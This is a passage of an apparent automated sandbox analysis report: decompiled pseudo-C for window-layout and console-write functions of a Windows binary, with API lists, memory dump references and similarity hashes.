													 *0xe17a64();
													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_t225 + 0x1ac))))() - 1; // -1
													_t293 = _t118;
													 *0xe17a64(_t293,  &_v20);
													 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 0x1c0))))();
													 *0xe17a64(_t293);
													_t174 =  *((intOrPtr*)( *((intOrPtr*)( *_t225 + 0x214))))();
													_t309 = 1;
												}
											}
											__eflags = _v20 + 0xfffffff0;
											E00CA2975(_t174, _v20 + 0xfffffff0);
											return E00DDD4FA(_t309);
										} else {
											 *0xe17a64();
											_t196 =  *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x50))))();
											__eflags = _t196;
											if(_t196 == 0) {
												goto L32;
											} else {
												_t294 =  &_v68;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												 *0xe17a64();
												__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_v152 + 0x38))))();
												if(__eflags != 0) {
													InflateRect( &_v68, 0, 1);
												}
												_t305 = _v148;
												_t201 = 2;
												_push(0);
												_push(0);
												_push(_t201);
												E00CC0777(_t222, _t305, _t284, _t294, _t305, __eflags,  &_v68, _t201, _t201, 0, _t201);
												_t290 = _v156;
											}
											L33:
											__eflags =  *0xe8738c;
											if( *0xe8738c != 0) {
												__eflags =  *(_t290 + 0xc00);
												if( *(_t290 + 0xc00) >= 0) {
													__eflags =  *(_t290 + 0xb78);
													if( *(_t290 + 0xb78) == 0) {
														 *0xe17a64(_t305);
														 *((intOrPtr*)( *((intOrPtr*)( *_t290 + 0x3c0))))();
													}
												}
											}
											goto L37;
										}
									}
								}
							}
						}
					}
				} else {
					if(E00CACA6C(0xe687c8, _t286) != 0) {
						_t218 = _t286;
					} else {
						 *0xe17a64(1, __esi);
						 *((intOrPtr*)( *((intOrPtr*)( *_t286 + 4))))();
						_t218 = 0;
					}
					return _t218;
				}
			}

0x00d00663
0x00d00663
0x00d00666
0x00d00667
0x00d0066f
0x00d00673
0x00d006a6
0x00d006ab
0x00d006ac
0x00d006b6
0x00d006bb
0x00d006bd
0x00d006c3
0x00d006c8
0x00d006cb
0x00d006ce
0x00d006d1
0x00d006db
0x00d006e3
0x00d006e6
0x00d006e9
0x00d006ec
0x00d006f6
0x00d006fc
0x00d006fd
0x00d00704
0x00d00709
0x00d0070d
0x00d00710
0x00d00717
0x00d00719
0x00d00719
0x00d0071f
0x00d00725
0x00d0072f
0x00d0073f
0x00d00740
0x00d00741
0x00d00742
0x00d00748
0x00d00749
0x00d0074a
0x00d0074b
0x00d0074c
0x00d00752
0x00d0075e
0x00d0076a
0x00d0076c
0x00d00773
0x00d00a2b
0x00d00a31
0x00d00a3b
0x00d00779
0x00d0078f
0x00d0079b
0x00d0079d
0x00d007a7
0x00d007b3
0x00d007b4
0x00d007b5
0x00d007bd
0x00d007c2
0x00d007c4
0x00000000
0x00d007ca
0x00d007dc
0x00d007e8
0x00d007ea
0x00d007f0
0x00d007f2
0x00d007f8
0x00d007fe
0x00d00804
0x00d00806
0x00d00812
0x00d00825
0x00d0082e
0x00d0082f
0x00d00830
0x00d00831
0x00d00832
0x00d00838
0x00d0083a
0x00d00840
0x00d0084a
0x00d0084a
0x00d00850
0x00d00856
0x00d00860
0x00d00860
0x00d00866
0x00d00869
0x00d00877
0x00d00877
0x00d0086b
0x00d0086b
0x00d0086d
0x00000000
0x00000000
0x00000000
0x00000000
0x00d0086d
0x00d00858
0x00d00858
0x00d0085e
0x00000000
0x00000000
0x00000000
0x00000000
0x00d0085e
0x00d00842
0x00d00842
0x00d00848
0x00d0086f
0x00d0086f
0x00000000
0x00000000
0x00000000
0x00d00848
0x00d00884
0x00d0088b
0x00d00892
0x00d00896
0x00d00899
0x00d0089f
0x00d008a1
0x00d008d1
0x00d008dd
0x00d008df
0x00d008df
0x00d008df
0x00d008e1
0x00d008ed
0x00d008ed
0x00d00812
0x00d008fa
0x00d00900
0x00d00906
0x00d00908
0x00d0090f
0x00d0090f
0x00d0090f
0x00d00912
0x00d00919
0x00d009f4
0x00d009f4
0x00d009fe
0x00d00a0b
0x00d00a10
0x00d00a18
0x00d00a26
0x00000000
0x00d0091f
0x00d0091f
0x00d00921
0x00d009be
0x00d009be
0x00000000
0x00d00927
0x00d00927
0x00d0092d
0x00000000
0x00d00933
0x00d00934
0x00d00936
0x00d0093b
0x00d00941
0x00d00943
0x00d00a3e
0x00d00a43
0x00d00a4b
0x00d00a50
0x00d00a5e
0x00d00a68
0x00d00a6d
0x00d00a70
0x00d00a75
0x00d00a7d
0x00d00a7f
0x00d00a87
0x00d00a8b
0x00d00a9a
0x00d00a9d
0x00000000
0x00d00aa3
0x00d00aa3
0x00000000
0x00d00aa3
0x00d00a8d
0x00d00a93
0x00d00aa6
0x00d00aac
0x00d00ab1
0x00d00ab6
0x00d00ab8
0x00d00b5a
0x00d00b5a
0x00d00b5a
0x00d00abe
0x00d00abe
0x00d00ac0
0x00d00ad1
0x00d00ada
0x00d00adc
0x00d00adc
0x00d00aed
0x00d00af8
0x00d00b04
0x00d00b0e
0x00d00b1a
0x00d00b26
0x00d00b26
0x00d00b36
0x00d00b3e
0x00d00b4b
0x00d00b53
0x00d00b57
0x00d00b57
0x00d00ab8
0x00d00b5f
0x00d00b62
0x00d00b6e
0x00d00949
0x00d00950
0x00d0095c
0x00d0095e
0x00d00960
0x00000000
0x00d00962
0x00d00968
0x00d00970
0x00d00971
0x00d00972
0x00d00973
0x00d00979
0x00d00987
0x00d00989
0x00d00993
0x00d00993
0x00d00999
0x00d009a3
0x00d009a4
0x00d009a5
0x00d009a6
0x00d009b1
0x00d009b6
0x00d009b6
0x00d009c4
0x00d009c4
0x00d009cb
0x00d009cd
0x00d009d4
0x00d009d6
0x00d009dd
0x00d009ea
0x00d009f2
0x00d009f2
0x00d009dd
0x00d009d4
0x00000000
0x00d009cb
0x00d00943
0x00d0092d
0x00d00921
0x00d00919
0x00d007c4
0x00d00675
0x00d00684
0x00d0069f
0x00d00686
0x00d00690
0x00d00698
0x00d0069a
0x00d0069c
0x00d006a3
0x00d006a3

APIs

Part of subcall function 00CEFC41: __EH_prolog3_GS.LIBCMT ref: 00CEFC4B

__EH_prolog3_GS.LIBCMT ref: 00D006B6
GetClientRect.USER32(?,?), ref: 00D006DB
GetClientRect.USER32(?,?), ref: 00D006F6
IntersectRect.USER32 ref: 00D00899
InflateRect.USER32(?,00000000,00000001), ref: 00D00993
__EH_prolog3.LIBCMT ref: 00D00A4B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$ClientH_prolog3_$H_prolog3InflateIntersect
String ID:
API String ID: 2963850475-0
Opcode ID: e3d6f2d54ce3984b7b9abb9818606cd1c915f1c6dc14421d0f1d0ab1f9552745
Instruction ID: 82f6db9113c9e8e77703f7394d0c62262b6e1ae1999af8fa8d0314802b58626e
Opcode Fuzzy Hash: e3d6f2d54ce3984b7b9abb9818606cd1c915f1c6dc14421d0f1d0ab1f9552745
Instruction Fuzzy Hash: B1E15B31A002299FDB14DF64CC45BAEBBBAFF49710F144199E909A7391CB70AE45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CEF120 Relevance: 9.3, APIs: 6, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CEF120(long __ecx, int __edx, void* __eflags) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				int _v44;
				int _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				int _t112;
				int _t122;
				void* _t129;
				void* _t141;
				long _t153;
				int _t170;
				int _t176;
				int _t184;
				void* _t191;
				intOrPtr* _t194;
				int _t202;
				intOrPtr* _t210;
				int _t223;
				int _t233;
				void* _t247;
				intOrPtr _t248;
				long _t249;
				int _t250;
				int _t252;
				void* _t258;
				long _t262;
				signed int _t274;

				_t246 = __edx;
				_t110 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t110 ^ _t274;
				_t255 = __ecx;
				_v24.bottom = __ecx;
				_t112 = E00CD8851(__edx, __ecx);
				_v52 = _t112;
				if(_t112 == 0 ||  *((intOrPtr*)(_t112 + 0x20)) == 0) {
					L55:
					return E00DDCBCE(_t112, _t191, _v8 ^ _t274, _t246, _t247, _t255);
				} else {
					_t248 =  *_t255;
					 *0xe17a64(_t247, _t191);
					 *0xe17a64( &_v48, 0 |  *((intOrPtr*)(_t255 + 0xb8)) == 0x00000000,  *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x164))))());
					_t194 = _v24.bottom;
					_t202 = _t194;
					 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x260))))();
					_t258 = 0x7fff;
					if(_v48 != 0x7fff && _v44 != 0x7fff) {
						_t249 = 0;
						__eflags = 0;
					} else {
						_t249 = 0;
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetClientRect( *(E00CB277F(_t194, _t202, _t246, GetParent( *(_t194 + 0x20))) + 0x20),  &_v24);
						_t122 =  *(_t194 + 0xc08);
						if(_v48 != _t258) {
							_t202 = _v24.bottom - _v24.top;
							_v44 = _t202;
							__eflags = _t122;
							if(_t122 != 0) {
								__eflags = _t202 - _t122;
								if(_t202 >= _t122) {
									_v44 = _t122;
								}
							}
						} else {
							_t202 = _v24.right - _v24.left;
							_v48 = _t202;
							if(_t122 != 0 && _t202 >= _t122) {
								_v48 = _t122;
							}
						}
					}
					_v40.left = _t249;
					_v40.top = _t249;
					_v40.right = _t249;
					_v40.bottom = _t249;
					GetWindowRect( *(_t194 + 0x20),  &_v40);
					if(E00CACA6C(0xe22148, E00CB277F(_t194, _t202, _t246, GetParent( *(_t194 + 0x20)))) == 0) {
						_t129 = _v40.bottom - _v40.top;
						__eflags =  *0xe8738c;
						if( *0xe8738c == 0) {
							__eflags = _t129 - _v44;
							if(_t129 == _v44) {
								L27:
								__eflags = _v40.right - _v40.left - _v48;
								if(__eflags == 0) {
									L36:
									 *0xe17a64();
									if( *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x170))))() != 0) {
										L49:
										_t255 =  *((intOrPtr*)( *_t194 + 0x228));
										 *0xe17a64(_t249);
										_t210 = _t194;
										_t250 =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x228))))();
										__eflags = _t250;
										if(_t250 == 0) {
											L52:
											_t112 = E00CACB0B(_t194, 0xe68914);
											__eflags = _t112;
											if(_t112 != 0) {
												L54:
												_pop(_t247);
												_pop(_t191);
												goto L55;
											}
											L53:
											_t255 =  *((intOrPtr*)( *_v52 + 0x178));
											 *0xe17a64(1);
											_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_v52 + 0x178))))();
											goto L54;
										}
										_t141 = E00CB277F(_t194, _t210, _t246, GetParent( *(_t194 + 0x20)));
										__eflags = _t141 - _t250;
										if(_t141 != _t250) {
											goto L52;
										}
										_t255 =  *((intOrPtr*)( *_t250 + 0x1b4));
										 *0xe17a64();
										 *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x1b4))))();
										_t112 = RedrawWindow( *(_t250 + 0x20), 0, 0, 0x105);
										goto L54;
									}
									 *0xe17a64();
									if( *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x17c))))() == 0 ||  *((intOrPtr*)(_t194 + 0xb8)) == _t249) {
										goto L49;
									} else {
										_t288 =  *((intOrPtr*)(_t194 + 0xbc)) - _t249;
										if( *((intOrPtr*)(_t194 + 0xbc)) == _t249) {
											goto L49;
										}
										_v24.left = _t249;
										_v24.top = _t249;
										_v24.right = _t249;
										_v24.bottom = _t249;
										 *0xe17a64();
										_t252 =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x164))))();
										E00D505CE( *((intOrPtr*)(_t194 + 0xbc)), _t288,  &_v24);
										_t153 = _v24.top;
										_t246 = _v44;
										if(_v24.bottom - _t153 == _t246 || _t252 == 0) {
											_t262 = _v24.left;
											_t223 = _v48;
											__eflags = _v24.right - _t262 - _t223;
											if(_v24.right - _t262 == _t223) {
												goto L47;
											}
											__eflags = _t252;
											if(_t252 != 0) {
												goto L47;
											}
											_t246 = _t223;
											_v24.right = _t262 + _t223;
											goto L46;
										} else {
											_v24.bottom = _t153 + _t246;
											L46:
											E00D5AB40( *((intOrPtr*)(_t194 + 0xb8)),  *((intOrPtr*)(_t194 + 0xbc)), _t246, 1);
											_t246 = _v44;
											_t223 = _v48;
											L47:
											if( *0xe8738c != 0) {
												E00CE5755(_t194, _t194, _t246, _t223, _t246);
												 *0xe17a64(_t194);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xbc)))) + 0x28))))();
											}
											goto L53;
										}
									}
								}
								__eflags = _v48 - _t258;
								if(__eflags == 0) {
									goto L36;
								}
								 *0xe17a64();
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x164))))();
								if(__eflags != 0) {
									goto L36;
								}
								L30:
								_v24.right = _t249;
								_v24.bottom = _t249;
								 *0xe17a64( &(_v24.right));
								 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x270))))();
								_t233 = _v24.right;
								__eflags = _t233 - _v48;
								if(_t233 <= _v48) {
									_t233 = _v48;
								}
								_t170 = _v24.bottom;
								__eflags = _t170 - _v44;
								if(_t170 <= _v44) {
									_t170 = _v44;
								}
								_push(_t249);
								_push(0x16);
								_push(_t170);
								_push(_t233);
								L35:
								 *0xe17a64(_t249, _t249, _t249);
								 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x238))))();
								E00CE57B6(_t194, _t246);
								goto L36;
							}
							__eflags = _v44 - _t258;
							if(_v44 == _t258) {
								goto L27;
							}
							 *0xe17a64();
							_t176 =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x164))))();
							__eflags = _t176;
							if(_t176 != 0) {
								goto L30;
							}
							_t258 = 0x7fff;
							goto L27;
						}
						__eflags = _t129 - _v44;
						if(_t129 == _v44) {
							L19:
							__eflags = _v40.right - _v40.left - _v48;
							if(__eflags == 0) {
								goto L36;
							}
							__eflags = _v48 - _t258;
							if(__eflags == 0) {
								goto L36;
							}
							 *0xe17a64();
							__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x164))))();
							if(__eflags != 0) {
								goto L36;
							}
							L22:
							_push(_t249);
							_push(0x16);
							_push(_v44);
							_push(_v48);
							goto L35;
						}
						__eflags = _v44 - _t258;
						if(_v44 == _t258) {
							goto L19;
						}
						 *0xe17a64();
						_t184 =  *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x164))))();
						__eflags = _t184;
						if(_t184 != 0) {
							goto L22;
						}
						_t258 = 0x7fff;
						goto L19;
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t249 = 0;
					 *0xe17a64(0, 0xffffffff, 0xffffffff, _v24.right - _v24.left, _v24.bottom - _v24.top, 0x16, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 0x238))))();
					goto L36;
				}
			}

0x00cef120
0x00cef126
0x00cef12d
0x00cef131
0x00cef134
0x00cef137
0x00cef13c
0x00cef142
0x00cef519
0x00cef525
0x00cef152
0x00cef154
0x00cef169
0x00cef182
0x00cef188
0x00cef18b
0x00cef18d
0x00cef18f
0x00cef197
0x00cef1ff
0x00cef1ff
0x00cef19e
0x00cef1a1
0x00cef1a3
0x00cef1a6
0x00cef1a9
0x00cef1ac
0x00cef1c2
0x00cef1c8
0x00cef1d1
0x00cef1ec
0x00cef1ef
0x00cef1f2
0x00cef1f4
0x00cef1f6
0x00cef1f8
0x00cef1fa
0x00cef1fa
0x00cef1f8
0x00cef1d3
0x00cef1d6
0x00cef1d9
0x00cef1de
0x00cef1e4
0x00cef1e4
0x00cef1de
0x00cef1d1
0x00cef204
0x00cef20b
0x00cef20e
0x00cef211
0x00cef214
0x00cef238
0x00cef27b
0x00cef27e
0x00cef285
0x00cef2f0
0x00cef2f3
0x00cef317
0x00cef31d
0x00cef320
0x00cef396
0x00cef3a0
0x00cef3ac
0x00cef498
0x00cef49b
0x00cef4a3
0x00cef4a9
0x00cef4ad
0x00cef4af
0x00cef4b1
0x00cef4ee
0x00cef4f5
0x00cef4fa
0x00cef4fc
0x00cef517
0x00cef517
0x00cef518
0x00000000
0x00cef518
0x00cef4fe
0x00cef505
0x00cef50d
0x00cef515
0x00000000
0x00cef515
0x00cef4bd
0x00cef4c2
0x00cef4c4
0x00000000
0x00000000
0x00cef4c8
0x00cef4d0
0x00cef4d8
0x00cef4e6
0x00000000
0x00cef4e6
0x00cef3bc
0x00cef3c8
0x00000000
0x00cef3da
0x00cef3da
0x00cef3e0
0x00000000
0x00000000
0x00cef3e8
0x00cef3eb
0x00cef3ee
0x00cef3f9
0x00cef3fc
0x00cef40c
0x00cef412
0x00cef41a
0x00cef41f
0x00cef424
0x00cef434
0x00cef439
0x00cef43c
0x00cef43e
0x00000000
0x00000000
0x00cef440
0x00cef442
0x00000000
0x00000000
0x00cef447
0x00cef449
0x00000000
0x00cef42a
0x00cef42c
0x00cef44c
0x00cef45d
0x00cef462
0x00cef465
0x00cef468
0x00cef46f
0x00cef479
0x00cef48c
0x00cef494
0x00cef494
0x00000000
0x00cef46f
0x00cef424
0x00cef3c8
0x00cef322
0x00cef325
0x00000000
0x00000000
0x00cef331
0x00cef33b
0x00cef33d
0x00000000
0x00000000
0x00cef33f
0x00cef345
0x00cef348
0x00cef353
0x00cef35b
0x00cef35d
0x00cef360
0x00cef363
0x00cef365
0x00cef365
0x00cef368
0x00cef36b
0x00cef36e
0x00cef370
0x00cef370
0x00cef373
0x00cef374
0x00cef376
0x00cef377
0x00cef378
0x00cef385
0x00cef38d
0x00cef391
0x00000000
0x00cef391
0x00cef2f5
0x00cef2f8
0x00000000
0x00000000
0x00cef304
0x00cef30c
0x00cef30e
0x00cef310
0x00000000
0x00000000
0x00cef312
0x00000000
0x00cef312
0x00cef287
0x00cef28a
0x00cef2ae
0x00cef2b4
0x00cef2b7
0x00000000
0x00000000
0x00cef2bd
0x00cef2c0
0x00000000
0x00000000
0x00cef2d0
0x00cef2da
0x00cef2dc
0x00000000
0x00000000
0x00cef2e2
0x00cef2e2
0x00cef2e3
0x00cef2e5
0x00cef2e8
0x00000000
0x00cef2e8
0x00cef28c
0x00cef28f
0x00000000
0x00000000
0x00cef29b
0x00cef2a3
0x00cef2a5
0x00cef2a7
0x00000000
0x00000000
0x00cef2a9
0x00000000
0x00cef2a9
0x00cef243
0x00cef244
0x00cef245
0x00cef246
0x00cef24a
0x00cef269
0x00cef271
0x00000000
0x00cef271

APIs

GetParent.USER32(00000000), ref: 00CEF1AF
GetClientRect.USER32(?,00CEEB3D), ref: 00CEF1C2
GetWindowRect.USER32 ref: 00CEF214
GetParent.USER32(00000000), ref: 00CEF21D
GetParent.USER32(00000000), ref: 00CEF4B6
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,?,?,?,?,?,?,00CEEB3D,00000000), ref: 00CEF4E6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$RectWindow$ClientRedraw
String ID:
API String ID: 443302174-0
Opcode ID: d811da9bf7f977bbe3fbaa467ddfee55b4598281565775678e6c4ab78ae78921
Instruction ID: 0e1454490d3ba09ef6dabb0e888bef89c444208b009e49a43d85cbad7be2a28e
Opcode Fuzzy Hash: d811da9bf7f977bbe3fbaa467ddfee55b4598281565775678e6c4ab78ae78921
Instruction Fuzzy Hash: DBD13B35A04259DFCF14CF6AC9849AEBBB6AF48710F1541ADE816B7364CB30AE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DF6FE0 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00DF6FE0(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xe89460 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E00DE309C( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0xe89460 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0xe69058; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0xe89460 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E00E02D18( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xe69058)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0xe89460 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00DDF660( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0xe89460 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00E02D18( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00DFAF87(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00DF3C65(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0xe89460 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0xe89460 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xe89460 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00DF5B1E( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
